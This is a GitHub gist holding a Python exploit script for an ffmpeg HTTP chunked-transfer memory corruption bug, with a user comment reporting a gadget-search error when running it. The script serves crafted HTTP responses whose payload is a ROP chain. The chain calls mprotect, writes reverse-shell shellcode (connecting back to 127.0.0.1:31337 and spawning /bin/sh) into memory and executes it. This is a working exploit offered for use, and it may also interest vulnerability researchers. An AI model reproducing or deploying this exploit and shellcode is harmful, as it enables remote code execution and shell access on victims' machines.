Skip to content

Instantly share code, notes, and snippets.

@PaulCher
Last active May 4, 2023 18:46
Show Gist options
  • Save PaulCher/324690b88db8c4cf844e056289d4a1d6 to your computer and use it in GitHub Desktop.
Save PaulCher/324690b88db8c4cf844e056289d4a1d6 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
import re
import os
import sys
import socket
import threading
from time import sleep
from pwn import *
bind_ip = '0.0.0.0'
bind_port = 12345
headers = """HTTP/1.1 200 OK
Server: HTTPd/0.9
Date: Sun, 10 Apr 2005 20:26:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
"""
elf = ELF('ffmpeg/ffmpeg')
shellcode_location = 0x00400000
page_size = 0x1000
rwx_mode = 7
gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64')))
pop_rdi = gadget('pop rdi; ret')
pop_rsi = gadget('pop rsi; ret')
pop_rax = gadget('pop rax; ret')
pop_rcx = gadget('pop rcx; ret')
pop_rdx = gadget('pop rdx; ret')
pop_rbp = gadget('pop rbp; ret')
push_rbx = gadget('push rbx; jmp rdi')
pop_rsp = gadget('pop rsp; ret')
add_rsp = gadget('add rsp, 0x58')
mov_gadget = gadget('mov qword [rcx], rax ; ret')
mprotect_func = elf.plt['mprotect']
read_func = elf.plt['read']
def handle_request(client_socket):
request = client_socket.recv(2048)
payload = ''
payload += 'C' * (0x8040)
payload += 'CCCCCCCC' * 4
payload += p64(0x0058dc48) # rop starts here
payload += 'CCCCCCCC' * 4
payload += p64(0x00d89257) # rdi
payload += p64(0x010ccd95) # call *%rax
payload += 'BBBBBBBB' * 3
payload += 'AAAA'
payload += p32(0)
payload += 'AAAAAAAA'
payload += p64(0x0058dc48) # second add_esp rop to jump to uncorrupted chunk
payload += 'XXXXXXXX' * 11
# real rop payload starts here
#
# using mprotect to create executable area
payload += p64(pop_rdi)
payload += p64(shellcode_location)
payload += p64(pop_rsi)
payload += p64(page_size)
payload += p64(pop_rdx)
payload += p64(rwx_mode)
payload += p64(mprotect_func)
# backconnect shellcode x86_64: 127.0.0.1:31337
shellcode = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\xc7\x44\x24\x04\x7f\x00\x00\x01\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";
shellcode = '\x90' * (8 - (len(shellcode) % 8)) + shellcode
shellslices = map(''.join, zip(*[iter(shellcode)]*8))
write_location = shellcode_location - 8
for shellslice in shellslices:
payload += p64(pop_rax)
payload += shellslice
payload += p64(pop_rcx)
payload += p64(write_location)
payload += p64(mov_gadget)
write_location += 8
payload += p64(pop_rbp)
payload += p64(4)
payload += p64(shellcode_location)
# 0x009e5641: mov qword [rcx], rax ; ret ; (1 found)
# 0x010ccd95: push rbx ; jmp rdi ; (1 found)
# 0x00d89257: pop rsp ; ret ; (1 found)
# 0x0058dc48: add rsp, 0x58 ; ret ; (1 found)
client_socket.send(headers)
client_socket.send('-1\n')
sleep(5)
client_socket.send(payload)
client_socket.close()
if __name__ == '__main__':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((bind_ip, bind_port))
s.listen(5)
filename = os.path.basename(__file__)
st = os.stat(filename)
while True:
client_socket, addr = s.accept()
handle_request(client_socket)
if os.stat(filename) != st:
print 'restarted'
sys.exit(0)
@VeilBlade
Copy link

latest i want to recurrent this bug
but when i run this script i got this output,and i can not find any infomation from the internet. can anybody help me

[@inspiron]:[CVE_2016_10191]$ ./exploit_ffmpeg.py
[
] '/media/
*/750G-01/downloads/CVE_2016_10191/bin/ffmpeg'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
FORTIFY: Enabled
Traceback (most recent call last):
File "./exploit_ffmpeg.py", line 56, in
mov_gadget = gadget('mov qword [rcx], rax; ret')
File "./exploit_ffmpeg.py", line 44, in
gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64')))
StopIteration

my system is:
Linux inspiron 4.10.0-35-generic #39~16.04.1-Ubuntu SMP Wed Sep 13 09:02:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment